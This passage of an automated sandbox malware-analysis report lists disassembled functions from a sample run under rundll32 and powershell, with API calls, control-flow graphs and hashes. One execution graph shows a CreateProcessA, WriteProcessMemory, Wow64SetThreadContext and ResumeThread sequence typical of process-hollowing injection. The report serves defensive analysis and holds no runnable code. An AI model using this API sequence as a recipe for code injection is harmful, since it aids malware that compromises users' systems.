                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • GetLastError.KERNEL32 ref: 6F957991
                                                                                                • __dosmaperr.LIBCMT ref: 6F957998
                                                                                                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9579D2
                                                                                                • __dosmaperr.LIBCMT ref: 6F9579D9
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 1913693674-0
                                                                                                • Opcode ID: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction ID: 78a20d634b7c6c4bc48c33d63c8dfc9a800d1de47c4891f9f1ab74e1c0d8c718
                                                                                                • Opcode Fuzzy Hash: 106d213be465e8bbc35f12edc7bc4e2a72873f08a5b858c4c96e4d53c6193b83
                                                                                                • Instruction Fuzzy Hash: A621B07120471EAF9B50DFB5C99085AB7ADEF01368710C519EE18871D0D730EE31CBA2
                                                                                                Function 6F958C2E Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 6F958C36
                                                                                                  • Part of subcall function 6F958B8B: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F95B7FF,?,00000000,-00000008), ref: 6F958BEC
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C6E
                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F958C8E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                                                                • String ID:
                                                                                                • API String ID: 158306478-0
                                                                                                • Opcode ID: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction ID: 9347431251b9575f5978865984a4f43ff6e5c38502980fab9cede6ebc57645cd
                                                                                                • Opcode Fuzzy Hash: d9790b809ee6d5fbb68c96597575fae9a4322b63d29cbfb3be0a61eba9aa171a
                                                                                                • Instruction Fuzzy Hash: 0D11A5F151A615BFB71597B58ECCCAF396CDF562A97000114F501952C5EB30ED21C7B1
                                                                                                Function 6F95D916 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000), ref: 6F95D92D
                                                                                                • GetLastError.KERNEL32(?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?,?,6F95C78B,00000000), ref: 6F95D939
                                                                                                  • Part of subcall function 6F95D8FF: CloseHandle.KERNEL32(FFFFFFFE,6F95D949,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?,?), ref: 6F95D90F
                                                                                                • ___initconout.LIBCMT ref: 6F95D949
                                                                                                  • Part of subcall function 6F95D8C1: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,6F95D8F0,6F95D0C4,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D8D4
                                                                                                • WriteConsoleW.KERNEL32(00000000,?,00000000,00000000,?,6F95D0D7,00000000,00000001,00000000,?,?,6F95C1E8,?,00000000,00000000,?), ref: 6F95D95E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                • String ID:
                                                                                                • API String ID: 2744216297-0
                                                                                                • Opcode ID: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction ID: 8be10e3987927ed1fee0474222823d1413298eda69ff01bfbbaaef7112f550fb
                                                                                                • Opcode Fuzzy Hash: 86ea7d3a8b6db4968cf77ff69b9186062e16c007ab02fe31077746fe7a85e8a4
                                                                                                • Instruction Fuzzy Hash: 61F0303640A555BBEF165F91DC44A993F77FF093B0B044059FB189A260CB32E930DB91
                                                                                                Function 6F954483 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112COMMONLIBRARYCODE
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6F9544A8
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.1946745973.000000006F951000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F950000, based on PE: true
                                                                                                • Associated: 00000004.00000002.1946719517.000000006F950000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946770145.000000006F960000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946792387.000000006F967000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000004.00000002.1946814784.000000006F969000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_4_2_6f950000_rundll32.jbxd
                                                                                                Similarity
                                                                                                • API ID: EncodePointer
                                                                                                • String ID: MOC$RCC
                                                                                                • API String ID: 2118026453-2084237596
                                                                                                • Opcode ID: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction ID: b081194dbf2f0f46654faa82a9f911484b17bc410737f2bd3b4605dd9e6d1423
                                                                                                • Opcode Fuzzy Hash: f0777ed0d399748d5e30526737e154581491d4571748bf396a66f906d37686cd
                                                                                                • Instruction Fuzzy Hash: 8D4159B1900209AFDF05CFA8D891AEE7BB9BF48308F148199F91467291D336E971DF51

                                                                                                Execution Graph

                                                                                                Execution Coverage:5.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:13
                                                                                                Total number of Limit Nodes:0
                                                                                                execution_graph 11362 4d17d50 11363 4d17d72 11362->11363 11367 4d18bc9 11363->11367 11371 4d18bd8 11363->11371 11364 4d17edb 11369 4d18bd8 11367->11369 11368 4d18c2b 11368->11364 11369->11368 11375 4d18994 11369->11375 11373 4d18c20 11371->11373 11372 4d18c2b 11372->11364 11373->11372 11374 4d18994 LoadLibraryW 11373->11374 11374->11372 11376 4d18de8 LoadLibraryW 11375->11376 11378 4d18e5d 11376->11378 11378->11368

                                                                                                Executed Functions

                                                                                                Function 04D18994 Relevance: 1.6, APIs: 1, Instructions: 53libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 667 4d18994-4d18e28 669 4d18e30-4d18e5b LoadLibraryW 667->669 670 4d18e2a-4d18e2d 667->670 671 4d18e64-4d18e81 669->671 672 4d18e5d-4d18e63 669->672 670->669 672->671
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 04D18E4E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.1694072703.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_4d10000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: ac533b63c1300a544f24cd29383e1e7eadf3581dc3016b7201af7710013a4cf8
                                                                                                • Instruction ID: 4a38122d72ee0f8ea27a82e2908e4cc0b5775488a3d186ade655199c9d2ddeef
                                                                                                • Opcode Fuzzy Hash: ac533b63c1300a544f24cd29383e1e7eadf3581dc3016b7201af7710013a4cf8
                                                                                                • Instruction Fuzzy Hash: 5A1144B1D003088FCB10DF9AD444A9EFBF5EF88320F10841AE819A7220C375A541CFA0
                                                                                                Function 04D18DE0 Relevance: 1.6, APIs: 1, Instructions: 52libraryCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 675 4d18de0-4d18e28 677 4d18e30-4d18e5b LoadLibraryW 675->677 678 4d18e2a-4d18e2d 675->678 679 4d18e64-4d18e81 677->679 680 4d18e5d-4d18e63 677->680 678->677 680->679
                                                                                                APIs
                                                                                                • LoadLibraryW.KERNELBASE(00000000), ref: 04D18E4E
                                                                                                Memory Dump Source
                                                                                                • Source File: 0000000C.00000002.1694072703.0000000004D10000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D10000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_12_2_4d10000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: LibraryLoad
                                                                                                • String ID:
                                                                                                • API String ID: 1029625771-0
                                                                                                • Opcode ID: af71a8c078db689d2d6aa5c19c2bd7b8f4fa7ca2f0af67356b678349a7df08b3
                                                                                                • Instruction ID: 9663bce5ef45e23dc7519f48166875231f3ef422004700b564bc2355a6301f2f
                                                                                                • Opcode Fuzzy Hash: af71a8c078db689d2d6aa5c19c2bd7b8f4fa7ca2f0af67356b678349a7df08b3
                                                                                                • Instruction Fuzzy Hash: 071114B59003498FCB10DF9AD444A9EFBF5AF88324F14842AD869A7610D375A545CFA1

                                                                                                Execution Graph

                                                                                                Execution Coverage:8.3%
                                                                                                Dynamic/Decrypted Code Coverage:0%
                                                                                                Signature Coverage:0%
                                                                                                Total number of Nodes:23
                                                                                                Total number of Limit Nodes:2
                                                                                                execution_graph 5593 8b5520 5594 8b5529 5593->5594 5595 8b5531 5594->5595 5597 8b5793 5594->5597 5599 8b579d 5597->5599 5598 8b5e12 5598->5595 5599->5598 5604 8b6768 WriteProcessMemory 5599->5604 5605 8b6770 WriteProcessMemory 5599->5605 5606 8b65d8 Wow64SetThreadContext 5599->5606 5607 8b65d1 Wow64SetThreadContext 5599->5607 5608 8b69f8 5599->5608 5612 8b69ec 5599->5612 5616 8b6528 5599->5616 5620 8b6521 5599->5620 5604->5599 5605->5599 5606->5599 5607->5599 5609 8b6a81 5608->5609 5609->5609 5610 8b6be6 CreateProcessA 5609->5610 5611 8b6c43 5610->5611 5613 8b6a81 CreateProcessA 5612->5613 5615 8b6c43 5613->5615 5617 8b6568 ResumeThread 5616->5617 5619 8b6599 5617->5619 5619->5599 5621 8b6568 ResumeThread 5620->5621 5623 8b6599 5621->5623 5623->5599

                                                                                                Executed Functions

                                                                                                Function 06DC28C8 Relevance: 7.7, Strings: 6, Instructions: 190COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 0 6dc28c8-6dc28ec 1 6dc2b4a-6dc2b51 0->1 2 6dc28f2-6dc28f7 0->2 3 6dc290f-6dc2913 2->3 4 6dc28f9-6dc28ff 2->4 5 6dc2919-6dc291d 3->5 6 6dc2af2-6dc2afc 3->6 8 6dc2901 4->8 9 6dc2903-6dc290d 4->9 10 6dc295d 5->10 11 6dc291f-6dc2930 5->11 12 6dc2afe-6dc2b07 6->12 13 6dc2b0a-6dc2b10 6->13 8->3 9->3 14 6dc295f-6dc2961 10->14 11->1 22 6dc2936-6dc293b 11->22 15 6dc2b16-6dc2b22 13->15 16 6dc2b12-6dc2b14 13->16 14->6 19 6dc2967-6dc296d 14->19 20 6dc2b24-6dc2b47 15->20 16->20 19->6 23 6dc2973-6dc2980 19->23 25 6dc293d-6dc2943 22->25 26 6dc2953-6dc295b 22->26 27 6dc2a16-6dc2a55 23->27 28 6dc2986-6dc298b 23->28 31 6dc2945 25->31 32 6dc2947-6dc2951 25->32 26->14 51 6dc2a5c-6dc2a60 27->51 29 6dc298d-6dc2993 28->29 30 6dc29a3-6dc29b9 28->30 33 6dc2995 29->33 34 6dc2997-6dc29a1 29->34 30->27 40 6dc29bb-6dc29db 30->40 31->26 32->26 33->30 34->30 44 6dc29dd-6dc29e3 40->44 45 6dc29f5-6dc2a14 40->45 46 6dc29e5 44->46 47 6dc29e7-6dc29f3 44->47 45->51 46->45 47->45 52 6dc2a62-6dc2a6b 51->52 53 6dc2a83 51->53 55 6dc2a6d-6dc2a70 52->55 56 6dc2a72-6dc2a7f 52->56 57 6dc2a86-6dc2a92 53->57 58 6dc2a81 55->58 56->58 60 6dc2a98-6dc2aef 57->60 58->57
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$(o^q$84^l$84^l$tP^q$tP^q
                                                                                                • API String ID: 0-1240530962
                                                                                                • Opcode ID: 5bfe850e7fec62e213c252df836abf8c625799a54e24fd8915af384b987c2419
                                                                                                • Instruction ID: 967ec0f70617bd44bfb2243196fba64cb464a73e0e5d35ad29d4066539435623
                                                                                                • Opcode Fuzzy Hash: 5bfe850e7fec62e213c252df836abf8c625799a54e24fd8915af384b987c2419
                                                                                                • Instruction Fuzzy Hash: 7361E030B4020EDFDB689F18C854BAABBE2BB88720F14856DE8559F354DB71DE41CB91
                                                                                                Function 06DC22D0 Relevance: 6.4, Strings: 5, Instructions: 149COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 62 6dc22d0-6dc22f3 63 6dc24ce-6dc24d5 62->63 64 6dc22f9-6dc22fe 62->64 65 6dc2316-6dc231a 64->65 66 6dc2300-6dc2306 64->66 70 6dc247b-6dc2485 65->70 71 6dc2320-6dc2324 65->71 68 6dc2308 66->68 69 6dc230a-6dc2314 66->69 68->65 69->65 72 6dc2487-6dc2490 70->72 73 6dc2493-6dc2499 70->73 74 6dc2326-6dc2335 71->74 75 6dc2337 71->75 78 6dc249f-6dc24ab 73->78 79 6dc249b-6dc249d 73->79 76 6dc2339-6dc233b 74->76 75->76 76->70 80 6dc2341-6dc2361 76->80 81 6dc24ad-6dc24cb 78->81 79->81 87 6dc2380 80->87 88 6dc2363-6dc237e 80->88 89 6dc2382-6dc2384 87->89 88->89 89->70 91 6dc238a-6dc238c 89->91 92 6dc239c 91->92 93 6dc238e-6dc239a 91->93 94 6dc239e-6dc23a0 92->94 93->94 94->70 96 6dc23a6-6dc23c6 94->96 99 6dc23de-6dc23e2 96->99 100 6dc23c8-6dc23ce 96->100 103 6dc23fc-6dc2400 99->103 104 6dc23e4-6dc23ea 99->104 101 6dc23d0 100->101 102 6dc23d2-6dc23d4 100->102 101->99 102->99 107 6dc2407-6dc2409 103->107 105 6dc23ec 104->105 106 6dc23ee-6dc23fa 104->106 105->103 106->103 109 6dc240b-6dc2411 107->109 110 6dc2421-6dc2478 107->110 111 6dc2415-6dc2417 109->111 112 6dc2413 109->112 111->110 112->110
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q$$^q$$^q$$^q
                                                                                                • API String ID: 0-3272787073
                                                                                                • Opcode ID: a52cc68e4b541e36b79e64fe263b85748a693c93a38b6117adc3eda4d3e2ef3c
                                                                                                • Instruction ID: a7f5d790363b832ea1b4a0cf3da48be9f78049e28cae48c6a62ef1fd5ad2f428
                                                                                                • Opcode Fuzzy Hash: a52cc68e4b541e36b79e64fe263b85748a693c93a38b6117adc3eda4d3e2ef3c
                                                                                                • Instruction Fuzzy Hash: CB41E431F1020ECFDBA89B79980067AB7E6AF94320F24842ED455DB295DF36CA45C7A1
                                                                                                Function 06DC28AF Relevance: 3.9, Strings: 3, Instructions: 123COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 114 6dc28af-6dc28ec 115 6dc2b4a-6dc2b51 114->115 116 6dc28f2-6dc28f7 114->116 117 6dc290f-6dc2913 116->117 118 6dc28f9-6dc28ff 116->118 119 6dc2919-6dc291d 117->119 120 6dc2af2-6dc2afc 117->120 122 6dc2901 118->122 123 6dc2903-6dc290d 118->123 124 6dc295d 119->124 125 6dc291f-6dc2930 119->125 126 6dc2afe-6dc2b07 120->126 127 6dc2b0a-6dc2b10 120->127 122->117 123->117 128 6dc295f-6dc2961 124->128 125->115 136 6dc2936-6dc293b 125->136 129 6dc2b16-6dc2b22 127->129 130 6dc2b12-6dc2b14 127->130 128->120 133 6dc2967-6dc296d 128->133 134 6dc2b24-6dc2b47 129->134 130->134 133->120 137 6dc2973-6dc2980 133->137 139 6dc293d-6dc2943 136->139 140 6dc2953-6dc295b 136->140 141 6dc2a16-6dc2a55 137->141 142 6dc2986-6dc298b 137->142 145 6dc2945 139->145 146 6dc2947-6dc2951 139->146 140->128 165 6dc2a5c-6dc2a60 141->165 143 6dc298d-6dc2993 142->143 144 6dc29a3-6dc29b9 142->144 147 6dc2995 143->147 148 6dc2997-6dc29a1 143->148 144->141 154 6dc29bb-6dc29db 144->154 145->140 146->140 147->144 148->144 158 6dc29dd-6dc29e3 154->158 159 6dc29f5-6dc2a14 154->159 160 6dc29e5 158->160 161 6dc29e7-6dc29f3 158->161 159->165 160->159 161->159 166 6dc2a62-6dc2a6b 165->166 167 6dc2a83 165->167 169 6dc2a6d-6dc2a70 166->169 170 6dc2a72-6dc2a7f 166->170 171 6dc2a86-6dc2a92 167->171 172 6dc2a81 169->172 170->172 174 6dc2a98-6dc2aef 171->174 172->171
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: (o^q$84^l$tP^q
                                                                                                • API String ID: 0-2373809280
                                                                                                • Opcode ID: 5017b1a3e5b8d2554977ebdd622b9cd164cc3064bfbacff6ff3e97c9f2a41489
                                                                                                • Instruction ID: 37a9ec303c33c8571d1e1716161124928b81258789a660bdfadb3942128c0032
                                                                                                • Opcode Fuzzy Hash: 5017b1a3e5b8d2554977ebdd622b9cd164cc3064bfbacff6ff3e97c9f2a41489
                                                                                                • Instruction Fuzzy Hash: A2419030E4020EDFDB64CF18C984B6ABBB2FB84330F1485ADE4559B251DB71DA41CB91
                                                                                                Function 06DC22B3 Relevance: 3.9, Strings: 3, Instructions: 106COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 176 6dc22b3-6dc22f3 178 6dc24ce-6dc24d5 176->178 179 6dc22f9-6dc22fe 176->179 180 6dc2316-6dc231a 179->180 181 6dc2300-6dc2306 179->181 185 6dc247b-6dc2485 180->185 186 6dc2320-6dc2324 180->186 183 6dc2308 181->183 184 6dc230a-6dc2314 181->184 183->180 184->180 187 6dc2487-6dc2490 185->187 188 6dc2493-6dc2499 185->188 189 6dc2326-6dc2335 186->189 190 6dc2337 186->190 193 6dc249f-6dc24ab 188->193 194 6dc249b-6dc249d 188->194 191 6dc2339-6dc233b 189->191 190->191 191->185 195 6dc2341-6dc2361 191->195 196 6dc24ad-6dc24cb 193->196 194->196 202 6dc2380 195->202 203 6dc2363-6dc237e 195->203 204 6dc2382-6dc2384 202->204 203->204 204->185 206 6dc238a-6dc238c 204->206 207 6dc239c 206->207 208 6dc238e-6dc239a 206->208 209 6dc239e-6dc23a0 207->209 208->209 209->185 211 6dc23a6-6dc23c6 209->211 214 6dc23de-6dc23e2 211->214 215 6dc23c8-6dc23ce 211->215 218 6dc23fc-6dc2400 214->218 219 6dc23e4-6dc23ea 214->219 216 6dc23d0 215->216 217 6dc23d2-6dc23d4 215->217 216->214 217->214 222 6dc2407-6dc2409 218->222 220 6dc23ec 219->220 221 6dc23ee-6dc23fa 219->221 220->218 221->218 224 6dc240b-6dc2411 222->224 225 6dc2421-6dc2478 222->225 226 6dc2415-6dc2417 224->226 227 6dc2413 224->227 226->225 227->225
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$$^q$$^q
                                                                                                • API String ID: 0-2291298209
                                                                                                • Opcode ID: b1c931a0fc08d1f63a679d7af7935c233983f1843cd30db6f4f2b755ebd30222
                                                                                                • Instruction ID: c923c6dd1f162aa9d94dd7726ff3c0e45a57f2e9cb7a7952ca969438031ad66c
                                                                                                • Opcode Fuzzy Hash: b1c931a0fc08d1f63a679d7af7935c233983f1843cd30db6f4f2b755ebd30222
                                                                                                • Instruction Fuzzy Hash: D331C330E0420EDFDBA58F69840177A7BB1AF95760F14406ED844DB292DB35CB41CBA2
                                                                                                Function 06DC25A0 Relevance: 2.6, Strings: 2, Instructions: 105COMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 229 6dc25a0-6dc25c5 230 6dc2709-6dc2711 229->230 231 6dc25cb-6dc25d0 229->231 232 6dc25e8-6dc25f4 231->232 233 6dc25d2-6dc25d8 231->233 238 6dc25fa-6dc25fd 232->238 239 6dc26b6-6dc26c0 232->239 234 6dc25dc-6dc25e6 233->234 235 6dc25da 233->235 234->232 235->232 238->239 241 6dc2603-6dc260a 238->241 242 6dc26ce-6dc26d4 239->242 243 6dc26c2-6dc26cb 239->243 241->230 244 6dc2610-6dc2615 241->244 245 6dc26da-6dc26e6 242->245 246 6dc26d6-6dc26d8 242->246 248 6dc262d-6dc2631 244->248 249 6dc2617-6dc261d 244->249 247 6dc26e8-6dc2706 245->247 246->247 248->239 253 6dc2637-6dc2639 248->253 251 6dc261f 249->251 252 6dc2621-6dc262b 249->252 251->248 252->248 253->239 255 6dc263b 253->255 258 6dc2642-6dc2644 255->258 259 6dc265c-6dc26b3 258->259 260 6dc2646-6dc264c 258->260 261 6dc264e 260->261 262 6dc2650-6dc2652 260->262 261->259 262->259
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1928352238.0000000006DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06DC0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_6dc0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: 4'^q$4'^q
                                                                                                • API String ID: 0-2697143702
                                                                                                • Opcode ID: 7caebb67d5bc0299b4b192fa6677d4ce5e178d7f6fd665e0adce21fa2bc9d5b0
                                                                                                • Instruction ID: 0b9e1f38d91fc811ec2e2041545666466c40c6a09be5385ab0b8c7508a08f968
                                                                                                • Opcode Fuzzy Hash: 7caebb67d5bc0299b4b192fa6677d4ce5e178d7f6fd665e0adce21fa2bc9d5b0
                                                                                                • Instruction Fuzzy Hash: CF319C31F4020ECFDB94DB69D54466AB7F2BB84320F24807ED4598B211EB31DA49CBE1
                                                                                                Function 008B69EC Relevance: 1.7, APIs: 1, Instructions: 249processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
                                                                                                control_flow_graph 264 8b69ec-8b6a8d 266 8b6a8f-8b6a99 264->266 267 8b6ac6-8b6ae6 264->267 266->267 268 8b6a9b-8b6a9d 266->268 272 8b6ae8-8b6af2 267->272 273 8b6b1f-8b6b4e 267->273 269 8b6a9f-8b6aa9 268->269 270 8b6ac0-8b6ac3 268->270 274 8b6aab 269->274 275 8b6aad-8b6abc 269->275 270->267 272->273 276 8b6af4-8b6af6 272->276 283 8b6b50-8b6b5a 273->283 284 8b6b87-8b6c41 CreateProcessA 273->284 274->275 275->275 277 8b6abe 275->277 278 8b6b19-8b6b1c 276->278 279 8b6af8-8b6b02 276->279 277->270 278->273 281 8b6b06-8b6b15 279->281 282 8b6b04 279->282 281->281 285 8b6b17 281->285 282->281 283->284 286 8b6b5c-8b6b5e 283->286 295 8b6c4a-8b6cd0 284->295 296 8b6c43-8b6c49 284->296 285->278 288 8b6b81-8b6b84 286->288 289 8b6b60-8b6b6a 286->289 288->284 290 8b6b6e-8b6b7d 289->290 291 8b6b6c 289->291 290->290 293 8b6b7f 290->293 291->290 293->288 306 8b6cd2-8b6cd6 295->306 307 8b6ce0-8b6ce4 295->307 296->295 306->307 308 8b6cd8-8b6cdb call 8b0444 306->308 309 8b6ce6-8b6cea 307->309 310 8b6cf4-8b6cf8 307->310 308->307 309->310 311 8b6cec-8b6cef call 8b0444 309->311 312 8b6cfa-8b6cfe 310->312 313 8b6d08-8b6d0c 310->313 311->310 312->313 316 8b6d00-8b6d03 call 8b0444 312->316 317 8b6d1e-8b6d25 313->317 318 8b6d0e-8b6d14 313->318 316->313 320 8b6d3c 317->320 321 8b6d27-8b6d36 317->321 318->317 323 8b6d3d 320->323 321->320 323->323
                                                                                                APIs
                                                                                                • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 008B6C2E
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000018.00000002.1833885028.00000000008B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 008B0000, based on PE: false
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_24_2_8b0000_powershell.jbxd
                                                                                                Similarity
                                                                                                • API ID: CreateProcess
                                                                                                • String ID:
                                                                                                • API String ID: 963392458-0
                                                                                                • Opcode ID: 1c11ef64a094342a27abcbdc69857ba434666ba93ff6c6ac07276fdfebbef83d
                                                                                                • Instruction ID: f70fe3f816f60e90eb58b17007b1d8926b6d145b3898eb6c8b218bd3ca54a6df
                                                                                                • Opcode Fuzzy Hash: 1c11ef64a094342a27abcbdc69857ba434666ba93ff6c6ac07276fdfebbef83d
                                                                                                • Instruction Fuzzy Hash: 36A14871D002198FDB14DF68C8417DEBBB2FF44314F1485A9E849E7240EB789995CF92
                                                                                                Function 008B69F8 Relevance: 1.7, APIs: 1, Instructions: 243processCOMMON
                                                                                                Download Yara Rule

                                                                                                Control-flow Graph

                                                                                                • Executed
                                                                                                • Not Executed
